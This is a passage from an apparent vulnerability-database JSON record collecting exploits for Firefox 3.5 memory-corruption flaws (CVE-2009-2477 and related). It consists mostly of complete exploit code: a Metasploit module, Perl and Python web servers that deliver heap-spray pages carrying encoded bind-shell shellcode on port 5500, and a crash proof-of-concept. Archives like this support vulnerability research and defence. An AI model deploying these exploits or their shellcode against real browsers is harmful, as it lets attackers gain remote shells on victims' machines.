sprayready) {\r\n for (xi=0; xi<800/100; xi++, sprayContainerIndex++)\r\n {\r\n sprayContainer[sprayContainerIndex] = fullblock + stackpivot + oneblock + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + ropgadget + shellcode;\r\n }\r\n } else {\r\n DataTranslator();\r\n GenerateHTML();\r\n }\r\n if(sprayContainer.length >= 1000) {\r\n sprayready = true;\r\n }\r\n}\r\n\r\nvar searchArray = new Array();\r\n\r\nfunction escapeData(data)\r\n{\r\n var xi;\r\n var xc;\r\n var escData='';\r\n for(xi=0; xi<data.length; xi++)\r\n {\r\n xc=data.charAt(xi);\r\n if(xc=='&' || xc=='?' 
|| xc=='=' || xc=='%' || xc==' ') xc = escape(xc);\r\n escData+=xc;\r\n }\r\n return escData;\r\n}\r\n\r\nfunction DataTranslator()\r\n{\r\n searchArray = new Array();\r\n searchArray[0] = new Array();\r\n searchArray[0][\"dac\"] = \"Kros\";\r\n var newElement = document.getElementById(\"content\");\r\n if (document.getElementsByTagName) {\r\n var xi=0;\r\n pTags = newElement.getElementsByTagName(\"p\");\r\n if (pTags.length > 0)\r\n while (xi < pTags.length)\r\n {\r\n oTags = pTags[xi].getElementsByTagName(\"font\");\r\n searchArray[xi+1] = new Array();\r\n if (oTags[0]) {\r\n searchArray[xi+1][\"dac\"] = oTags[0].innerHTML;\r\n }\r\n xi++;\r\n }\r\n }\r\n}\r\n\r\nfunction GenerateHTML()\r\n{\r\n var xhtml = \"\";\r\n for (xi=1;xi<searchArray.length;xi++)\r\n {\r\n xhtml += escapeData(searchArray[xi][\"dac\"]);\r\n }\r\n}\r\n\r\nsetInterval(\"fill_function()\", .5);\r\n\r\n</script>\r\n</body>\r\n</html>\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40936/"}, {"lastseen": "2016-02-01T23:32:48", "description": "Firefox 3.5 escape() Return Value Memory Corruption. CVE-2009-2477. Remote exploits for multiple platform", "published": "2010-09-20T00:00:00", "type": "exploitdb", "title": "Firefox 3.5 escape Return Value Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16299", "href": "https://www.exploit-db.com/exploits/16299/", "sourceData": "##\r\n# $Id: firefox_escape_retval.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\t#\r\n\t# This module acts as an HTTP server\r\n\t#\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:ua_name => HttpClients::FF,\r\n\t\t:ua_minver => \"3.5\",\r\n\t\t:ua_maxver => \"3.5\",\r\n\t\t:os_name => OperatingSystems::WINDOWS,\r\n\t\t:javascript => true,\r\n\t\t:rank => NormalRanking, # reliable memory corruption\r\n\t\t:vuln_test => nil,\r\n\t})\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Firefox 3.5 escape() Return Value Memory Corruption',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a memory corruption vulnerability in the Mozilla\r\n\t\t\t\tFirefox browser. This flaw occurs when a bug in the javascript interpreter\r\n\t\t\t\tfails to preserve the return value of the escape() function and results in\r\n\t\t\t\tuninitialized memory being used instead. 
This module has only been tested\r\n\t\t\t\ton Windows, but should work on other platforms as well with the current\r\n\t\t\t\ttargets.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Simon Berry-Byrne <x00050876[at]itnet.ie>', # Author / Publisher / Original exploit\r\n\t\t\t\t\t'hdm', # Metasploit conversion\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2009-2477'],\r\n\t\t\t\t\t['OSVDB', '55846'],\r\n\t\t\t\t\t['BID', '35660'],\r\n\t\t\t\t\t['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=503286']\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000 + (rand(256).to_i * 4),\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Firefox 3.5.0 on Windows XP SP0-SP3',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Ret' => 0x0c0c0c0c,\r\n\t\t\t\t\t\t\t'BlockLen' => 0x60000,\r\n\t\t\t\t\t\t\t'Containers' => 800,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Ret' => 0x41414141,\r\n\t\t\t\t\t\t\t'BlockLen' => 496,\r\n\t\t\t\t\t\t\t'Containers' => 800000\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jul 14 2006'\r\n\t\t\t))\r\n\tend\r\n\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\tsend_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html; charset=utf-8' })\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\tdef generate_html(payload)\r\n\r\n\t\tenc_code = Rex::Text.to_unescape(payload.encoded, 
Rex::Arch.endian(target.arch))\r\n\t\tenc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))\r\n\t\tenc_ret = Rex::Text.to_unescape(\r\n\t\t\tRex::Arch.endian(target.arch) == ENDIAN_LITTLE ? [target.ret].pack('V') : [target.ret].pack('N')\r\n\t\t)\r\n\r\n\t\tvar_data_str1 = Rex::Text.rand_text_alpha(3)\r\n\t\tvar_data_str2 = Rex::Text.rand_text_alpha(4)\r\n\t\tjs = <<-EOF\r\nvar xunescape = unescape;\r\nvar shellcode = xunescape(\"#{enc_code}\");\r\n\r\noneblock = xunescape(\"#{enc_ret}\");\r\n\r\nvar fullblock = oneblock;\r\nwhile (fullblock.length < #{target['BlockLen']})\r\n{\r\n\tfullblock += fullblock;\r\n}\r\n\r\nvar sprayContainer = new Array();\r\nvar sprayready = false;\r\nvar sprayContainerIndex = 0;\r\n\r\nfunction fill_function()\r\n{\r\n\tif(! sprayready) {\r\n\t\tfor (xi=0; xi<#{target['Containers']}/100; xi++, sprayContainerIndex++)\r\n\t\t{\r\n\t\t\tsprayContainer[sprayContainerIndex] = fullblock + shellcode;\r\n\t\t}\r\n\t} else {\r\n\t\tDataTranslator();\r\n\t\tGenerateHTML();\r\n\t}\r\n\tif(sprayContainer.length >= #{target['Containers']}) {\r\n\t\tsprayready = true;\r\n\t}\r\n}\r\n\r\nvar searchArray = new Array();\r\n\r\nfunction escapeData(data)\r\n{\r\n\tvar xi;\r\n\tvar xc;\r\n\tvar escData='';\r\n\tfor(xi=0; xi<data.length; xi++)\r\n\t{\r\n\t\txc=data.charAt(xi);\r\n\t\tif(xc=='&' || xc=='?' 
|| xc=='=' || xc=='%' || xc==' ') xc = escape(xc);\r\n\t\t\tescData+=xc;\r\n\t}\r\n\treturn escData;\r\n}\r\n\r\nfunction DataTranslator()\r\n{\r\n\tsearchArray = new Array();\r\n\tsearchArray[0] = new Array();\r\n\tsearchArray[0][\"#{var_data_str1}\"] = \"#{var_data_str2}\";\r\n\tvar newElement = document.getElementById(\"content\");\r\n\tif (document.getElementsByTagName) {\r\n\t\tvar xi=0;\r\n\t\tpTags = newElement.getElementsByTagName(\"p\");\r\n\t\tif (pTags.length > 0)\r\n\t\t\twhile (xi < pTags.length)\r\n\t\t\t\t{\r\n\t\t\t\t\toTags = pTags[xi].getElementsByTagName(\"font\");\r\n\t\t\t\t\tsearchArray[xi+1] = new Array();\r\n\t\t\t\t\tif (oTags[0]) {\r\n\t\t\t\t\t\tsearchArray[xi+1][\"#{var_data_str1}\"] = oTags[0].innerHTML;\r\n\t\t\t\t\t}\r\n\t\t\t\t\txi++;\r\n\t\t\t\t}\r\n\t}\r\n}\r\n\r\nfunction GenerateHTML()\r\n{\r\n\tvar xhtml = \"\";\r\n\tfor (xi=1;xi<searchArray.length;xi++)\r\n\t{\r\n\t\txhtml += escapeData(searchArray[xi][\"#{var_data_str1}\"]);\r\n\t}\r\n}\r\n\r\nsetInterval(\"fill_function()\", .5);\r\nEOF\r\n\r\n\t\t# Obfuscate it up a bit\r\n\t\tjs = obfuscate_js(js, 'Symbols' => {\r\n\t\t\t'Variables' => %W{ DataTranslator GenerateHTML escapeData xunescape shellcode oneblock fullblock sprayContainer xi searchArray xc escData xhtml pTags oTags newElement sprayready sprayContainerIndex fill_function }\r\n\t\t}).to_s\r\n\r\n\t\tstr1 = Rex::Text.rand_text_alpha(20)\r\n\t\tstr2 = Rex::Text.rand_text_alpha(24)\r\n\t\tstr3 = Rex::Text.rand_text_alpha(10) + \" \"\r\n\r\n\t\treturn %Q^\r\n<html>\r\n<head>\r\n<div id=\"content\">\r\n<p>\r\n<FONT>\r\n</FONT>\r\n</p>\r\n<p>\r\n<FONT>#{str1}</FONT></p>\r\n<p>\r\n<FONT>#{str2}</FONT>\r\n</p>\r\n<p>\r\n<FONT>#{str3}</FONT>\r\n</p>\r\n</div>\r\n<script language=\"JavaScript\">\r\n#{js}\r\n</script>\r\n</body>\r\n</html>\r\n^\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": 
"https://www.exploit-db.com/download/16299/"}, {"lastseen": "2016-02-01T10:07:04", "description": "Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit (pl). CVE-2009-2477. Remote exploit for windows platform", "published": "2009-07-20T00:00:00", "type": "exploitdb", "title": "Mozilla Firefox 3.5 Font tags Remote Heap Spray Exploit pl", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "modified": "2009-07-20T00:00:00", "id": "EDB-ID:9214", "href": "https://www.exploit-db.com/exploits/9214/", "sourceData": "##################################################\r\n# FireFox 3.5 Heap Spray\r\n# Discovered by: Simon Berry-Bryne\r\n# Coded in Perl by netsoul, ALTO PARANA - Paraguay\r\n# Contact: netsoul2 [at] gmail [dot] com\r\n##################################################\r\n\r\n#!/usr/bin/perl -w\r\nuse strict;\r\nuse POE::Component::Server::HTTP;\r\nPOE::Component::Server::HTTP->new(Port => my $port = 8080,\r\nContentHandler => {\"/\" => sub{$_[1]->push_header(\"Content-Type\", \"text/html\"), $_[1]->content(<DATA>)}});\r\n\r\nprint \"[-] Listening in port $port...\\n[-] Sending payload...\\n[-] After 30 secs try with netcat for connect in port 5500\\n\";\r\nPOE::Kernel->run();\r\n\r\n__DATA__\r\n<html>\r\n<head>\r\n<title>Exploiting Firefox 3.5</title>\r\n<script language= javascript>\r\n//windows - shell_bind_tcp - metasploit - encoding is shikata_ga_nai\r\nvar shellcode= unescape(\"%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b%u8b3c%u057c%u0178%u8bef\" +\r\n\t\t\t\"%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca\" +\r\n\t\t\t\"%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01\" +\r\n\t\t\t\"%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b%u8b30%u0c40%u708b%uad1c%u408b\" +\r\n\t\t\t\"%u5e08%u8e68%u0e4e%u50ec%ud6ff%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff\" +\r\n\t\t\t\"%ucb68%ufced%u503b%ud6ff%u895f%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9\" 
+\r\n\t\t\t\"%uadf5%uff57%u53d6%u5353%u5353%u5343%u5343%ud0ff%u6866%u7c15%u5366%ue189\" +\r\n\t\t\t\"%u6895%u1aa4%uc770%uff57%u6ad6%u5110%uff55%u68d0%uada4%ue92e%uff57%u53d6\" +\r\n\t\t\t\"%uff55%u68d0%u49e5%u4986%uff57%u50d6%u5454%uff55%u93d0%ue768%uc679%u5779\" +\r\n\t\t\t\"%ud6ff%uff55%u66d0%u646a%u6866%u6d63%ue589%u506a%u2959%u89cc%u6ae7%u8944\" +\r\n\t\t\t\"%u31e2%uf3c0%ufeaa%u2d42%u42fe%u932c%u7a8d%uab38%uabab%u7268%ub3fe%uff16\" +\r\n\t\t\t\"%u4475%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff%uad68%u05d9%u53ce\" +\r\n\t\t\t\"%ud6ff%uff6a%u37ff%ud0ff%u578b%u83fc%u64c4%ud6ff%uff52%u68d0%uceef%u60e0\" +\r\n\t\t\t\"%uff53%uffd6%u41d0\");\r\noneblock = unescape(\"%u0c0c%u0c0c\");\r\nvar fullblock = oneblock;\r\nwhile (fullblock.length<0x60000) \r\n{\r\n fullblock += fullblock;\r\n}\r\nsprayContainer = new Array();\r\nfor (i=0; i<600; i++) \r\n{\r\n sprayContainer[i] = fullblock + shellcode;\r\n}\r\nvar searchArray = new Array()\r\n \r\nfunction escapeData(data)\r\n{\r\n var i;\r\n var c;\r\n var escData='';\r\n for(i=0;i<data.length;i++)\r\n {\r\n c=data.charAt(i);$poe_kernel\r\n if(c=='&' || c=='?' 
|| c=='=' || c=='%' || c==' ') c = escape(c);\r\n escData+=c;\r\n }\r\n return escData;\r\n}\r\nfunction DataTranslator(){\r\n searchArray = new Array();\r\n searchArray[0] = new Array();\r\n searchArray[0][\"str\"] = \"blah\";\r\n var newElement = document.getElementById(\"content\")\r\n if (document.getElementsByTagName) {\r\n var i=0;\r\n pTags = newElement.getElementsByTagName(\"p\")\r\n if (pTags.length > 0) \r\n while (i<pTags.length)\r\n {\r\n oTags = pTags[i].getElementsByTagName(\"font\")\r\n searchArray[i+1] = new Array()\r\n if (oTags[0]) \r\n {\r\n searchArray[i+1][\"str\"] = oTags[0].innerHTML;\r\n }\r\n i++\r\n }\r\n }\r\n}\r\n \r\nfunction GenerateHTML()\r\n{\r\n var html = \"\";\r\n for (i=1;i<searchArray.length;i++)\r\n {\r\n html += escapeData(searchArray[i][\"str\"])\r\n } \r\n}\r\nDataTranslator();\r\nGenerateHTML()\r\n</script>\r\n</body>\r\n</html>\r\n\r\n# milw0rm.com [2009-07-20]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9214/"}, {"lastseen": "2016-02-01T09:59:52", "description": "Mozilla Firefox 3.5 unicode Remote Buffer Overflow PoC. CVE-2009-2479. 
Dos exploit for windows platform", "published": "2009-07-15T00:00:00", "type": "exploitdb", "title": "Mozilla Firefox 3.5 unicode Remote Buffer Overflow PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2479"], "modified": "2009-07-15T00:00:00", "id": "EDB-ID:9158", "href": "https://www.exploit-db.com/exploits/9158/", "sourceData": "------------------------------------------->\r\nFirefox 3.5 unicode stack overflow\r\n\r\nAndrew Haynes , Simon Berry-Byrne\r\n\r\n\r\n------------------------------------------->\r\n\r\n\r\n<html>\r\n<head>\r\n<script language=\"JavaScript\" type=\"Text/Javascript\">\r\n\tvar str = unescape(\"%u4141%u4141\");\r\n\tvar str2 = unescape(\"%u0000%u0000\");\r\n\tvar finalstr2 = mul8(str2, 49000000);\r\n\tvar finalstr = mul8(str, 21000000);\r\n\r\n\r\ndocument.write(finalstr2); \r\ndocument.write(finalstr); \r\n\r\nfunction mul8 (str, num) {\r\n\tvar\ti = Math.ceil(Math.log(num) / Math.LN2),\r\n\t\tres = str;\r\n\tdo {\r\n\t\tres += res;\r\n\t} while (0 < --i);\r\n\treturn res.slice(0, str.length * num);\r\n}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n<html><body></body></html>\r\n\r\n# milw0rm.com [2009-07-15]\r\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9158/"}, {"lastseen": "2016-02-01T10:03:12", "description": "Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit. CVE-2009-2478. 
Remote exploit for windows platform", "published": "2009-07-17T00:00:00", "type": "exploitdb", "title": "Mozilla Firefox 3.5 Font tags Remote Heap Spray Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2478"], "modified": "2009-07-17T00:00:00", "id": "EDB-ID:9181", "href": "https://www.exploit-db.com/exploits/9181/", "sourceData": "#!/usr/bin/env python\r\n#######################################################\r\n#\r\n# FireFox 3.5 Heap Spray Exploit\r\n# Originally discovered by: Simon Berry-Bryne\r\n# Pythonized by: David Kennedy (ReL1K) @ SecureState\r\n#\r\n#######################################################\r\nfrom BaseHTTPServer import HTTPServer \r\nfrom BaseHTTPServer import BaseHTTPRequestHandler \r\nimport sys \r\n\r\nclass myRequestHandler(BaseHTTPRequestHandler):\r\n\r\n def do_GET(self):\r\n self.printCustomHTTPResponse(200)\r\n if self.path == \"/\":\r\n target=self.client_address[0]\r\n self.wfile.write(\"\"\"\r\n<html>\r\n<head>\r\n<title>Firefox 3.5 Vulnerability</title>\r\nFirefox 3.5 Heap Spray Exploit\r\n</br>\r\nDiscovered by: SBerry aka Simon Berry-Byrne\r\nPythonized: David Kennedy (ReL1K) at SecureState\r\nBind Shell Port: 5500\r\nEncoding: Shikata_Ga_Nai\r\n</br>\r\n<div id=\"content\">\r\n<p>\r\n<FONT> \r\n</FONT>\r\n</p>\r\n<p>\r\n<FONT>Ihazacrashihazacrash</FONT></p>\r\n<p>\r\n<FONT>Ohnoesihazacrashhazcrash</FONT>\r\n</p>\r\n<p>\r\n<FONT>Aaaaahhhhh </FONT>\r\n</p>\r\n</div>\r\n<script language=JavaScript>\r\n\r\n// windows/shell_bind_tcp - 317 bytes http://www.metasploit.com LPORT=5500 encoding=shikata_ga_nai\r\nvar shellcode= unescape(\"%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b%u8b3c%u057c%u0178%u8bef\" +\r\n\t\t\t\"%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca\" +\r\n\t\t\t\"%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01\" +\r\n\t\t\t\"%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b%u8b30%u0c40%u708b%uad1c%u408b\" 
+\r\n\t\t\t\"%u5e08%u8e68%u0e4e%u50ec%ud6ff%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff\" +\r\n\t\t\t\"%ucb68%ufced%u503b%ud6ff%u895f%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9\" +\r\n\t\t\t\"%uadf5%uff57%u53d6%u5353%u5353%u5343%u5343%ud0ff%u6866%u7c15%u5366%ue189\" +\r\n\t\t\t\"%u6895%u1aa4%uc770%uff57%u6ad6%u5110%uff55%u68d0%uada4%ue92e%uff57%u53d6\" +\r\n\t\t\t\"%uff55%u68d0%u49e5%u4986%uff57%u50d6%u5454%uff55%u93d0%ue768%uc679%u5779\" +\r\n\t\t\t\"%ud6ff%uff55%u66d0%u646a%u6866%u6d63%ue589%u506a%u2959%u89cc%u6ae7%u8944\" +\r\n\t\t\t\"%u31e2%uf3c0%ufeaa%u2d42%u42fe%u932c%u7a8d%uab38%uabab%u7268%ub3fe%uff16\" +\r\n\t\t\t\"%u4475%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff%uad68%u05d9%u53ce\" +\r\n\t\t\t\"%ud6ff%uff6a%u37ff%ud0ff%u578b%u83fc%u64c4%ud6ff%uff52%u68d0%uceef%u60e0\" +\r\n\t\t\t\"%uff53%uffd6%u41d0\");\r\noneblock = unescape(\"%u0c0c%u0c0c\");\r\nvar fullblock = oneblock;\r\nwhile (fullblock.length<0x60000) \r\n{\r\n fullblock += fullblock;\r\n}\r\nsprayContainer = new Array();\r\nfor (i=0; i<600; i++) \r\n{\r\n sprayContainer[i] = fullblock + shellcode;\r\n}\r\nvar searchArray = new Array()\r\n \r\nfunction escapeData(data)\r\n{\r\n var i;\r\n var c;\r\n var escData='';\r\n for(i=0;i<data.length;i++)\r\n {\r\n c=data.charAt(i);\r\n if(c=='&' || c=='?' 
|| c=='=' || c=='%' || c==' ') c = escape(c);\r\n escData+=c;\r\n }\r\n return escData;\r\n}\r\nfunction DataTranslator(){\r\n searchArray = new Array();\r\n searchArray[0] = new Array();\r\n searchArray[0][\"str\"] = \"blah\";\r\n var newElement = document.getElementById(\"content\")\r\n if (document.getElementsByTagName) {\r\n var i=0;\r\n pTags = newElement.getElementsByTagName(\"p\")\r\n if (pTags.length > 0) \r\n while (i<pTags.length)\r\n {\r\n oTags = pTags[i].getElementsByTagName(\"font\")\r\n searchArray[i+1] = new Array()\r\n if (oTags[0]) \r\n {\r\n searchArray[i+1][\"str\"] = oTags[0].innerHTML;\r\n }\r\n i++\r\n }\r\n }\r\n}\r\n \r\nfunction GenerateHTML()\r\n{\r\n var html = \"\";\r\n for (i=1;i<searchArray.length;i++)\r\n {\r\n html += escapeData(searchArray[i][\"str\"])\r\n } \r\n}\r\nDataTranslator();\r\nGenerateHTML()\r\n</script>\r\n</body>\r\n</html>\"\"\")\r\n print (\"\\n\\n[-] Exploit sent... [-]\\n[-] Wait about 30 seconds and attempt to connect.[-]\\n[-] Connect to IP Address: %s and port 5500 [-]\" % (target))\r\n\r\n def printCustomHTTPResponse(self, respcode):\r\n self.send_response(respcode)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.send_header(\"Server\", \"myRequestHandler\")\r\n self.end_headers()\r\n\r\nhttpd = HTTPServer(('', 80), myRequestHandler)\r\n\r\nprint (\"\"\"\r\n#######################################################\r\n#\r\n# FireFox 3.5 Heap Spray\r\n# Originally discovered by: Simon Berry-Bryne\r\n# Pythonized: David Kennedy (ReL1K) @ SecureState\r\n#\r\n#######################################################\r\n\"\"\")\r\nprint (\"Listening on port 80.\")\r\nprint (\"Have someone connect to you.\")\r\nprint (\"\\nType <control>-c to exit..\")\r\ntry:\r\n httpd.handle_request()\r\n httpd.serve_forever() \r\nexcept KeyboardInterrupt:\r\n print (\"\\n\\nExiting exploit...\\n\\n\")\r\n sys.exit(1)\r\n\r\n# milw0rm.com [2009-07-17]\r\n", "cvss": {"score": 5.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9181/"}], "canvas": [{"lastseen": "2019-05-29T17:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "description": "**Name**| firefox_35 \n---|--- \n**CVE**| CVE-2009-2477 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Firefox 3.5 Remote Code Execution \n**Notes**| CVE Name: CVE-2009-2477 \nVENDOR: Mozilla \nNotes: Although the advisories states that this due to improper handling of and \n\ntags, this exploit uses another method to reach the \nvulnerability. For now - if the target browser is closed then the socket is lost - so you might want to install a MOSDEF service as soon as you can. This version is not yet \nDEP safe. \nRepeatability: One shot \nCVE Url: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2477 \nCVSS: 9.3 \n\n", "edition": 2, "modified": "2009-07-15T15:30:00", "published": "2009-07-15T15:30:00", "id": "FIREFOX_35", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/firefox_35", "title": "Immunity Canvas: FIREFOX_35", "type": "canvas", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-07-24T20:18:55", "description": "This module exploits a memory corruption vulnerability in the Mozilla Firefox browser. This flaw occurs when a bug in the javascript interpreter fails to preserve the return value of the escape() function and results in uninitialized memory being used instead. 
This module has only been tested on Windows, but should work on other platforms as well with the current targets.\n", "published": "2009-07-14T21:59:35", "type": "metasploit", "title": "Firefox 3.5 escape() Return Value Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/MULTI/BROWSER/FIREFOX_ESCAPE_RETVAL", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n #\n # This module acts as an HTTP server\n #\n include Msf::Exploit::Remote::HttpServer::HTML\n\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({\n # :ua_name => HttpClients::FF,\n # :ua_minver => \"3.5\",\n # :ua_maxver => \"3.5\",\n # :os_name => OperatingSystems::Match::WINDOWS,\n # :javascript => true,\n # :rank => NormalRanking, # reliable memory corruption\n # :vuln_test => nil,\n #})\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Firefox 3.5 escape() Return Value Memory Corruption',\n 'Description' => %q{\n This module exploits a memory corruption vulnerability in the Mozilla\n Firefox browser. This flaw occurs when a bug in the javascript interpreter\n fails to preserve the return value of the escape() function and results in\n uninitialized memory being used instead. 
This module has only been tested\n on Windows, but should work on other platforms as well with the current\n targets.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Simon Berry-Byrne <x00050876[at]itnet.ie>', # Author / Publisher / Original exploit\n 'hdm', # Metasploit conversion\n ],\n 'References' =>\n [\n ['CVE', '2009-2477'],\n ['OSVDB', '55846'],\n ['BID', '35660'],\n ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=503286']\n ],\n 'Payload' =>\n {\n 'Space' => 1000 + (rand(256).to_i * 4),\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => %w{ win osx },\n 'Targets' =>\n [\n [ 'Firefox 3.5.0 on Windows XP SP0-SP3',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Ret' => 0x0c0c0c0c,\n 'BlockLen' => 0x60000,\n 'Containers' => 800,\n }\n ],\n [ 'Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86,\n 'Ret' => 0x41414141,\n 'BlockLen' => 496,\n 'Containers' => 800000\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jul 13 2009'\n ))\n end\n\n\n def on_request_uri(cli, request)\n\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n print_status(\"Sending #{self.name}\")\n send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html; charset=utf-8' })\n handler(cli)\n end\n\n def generate_html(payload)\n\n enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))\n enc_ret = Rex::Text.to_unescape(\n Rex::Arch.endian(target.arch) == ENDIAN_LITTLE ? 
[target.ret].pack('V') : [target.ret].pack('N')\n )\n\n var_data_str1 = Rex::Text.rand_text_alpha(3)\n var_data_str2 = Rex::Text.rand_text_alpha(4)\n js = <<-EOF\nvar xunescape = unescape;\nvar shellcode = xunescape(\"#{enc_code}\");\n\noneblock = xunescape(\"#{enc_ret}\");\n\nvar fullblock = oneblock;\nwhile (fullblock.length < #{target['BlockLen']})\n{\n fullblock += fullblock;\n}\n\nvar sprayContainer = new Array();\nvar sprayready = false;\nvar sprayContainerIndex = 0;\n\nfunction fill_function()\n{\n if(! sprayready) {\n for (xi=0; xi<#{target['Containers']}/100; xi++, sprayContainerIndex++)\n {\n sprayContainer[sprayContainerIndex] = fullblock + shellcode;\n }\n } else {\n DataTranslator();\n GenerateHTML();\n }\n if(sprayContainer.length >= #{target['Containers']}) {\n sprayready = true;\n 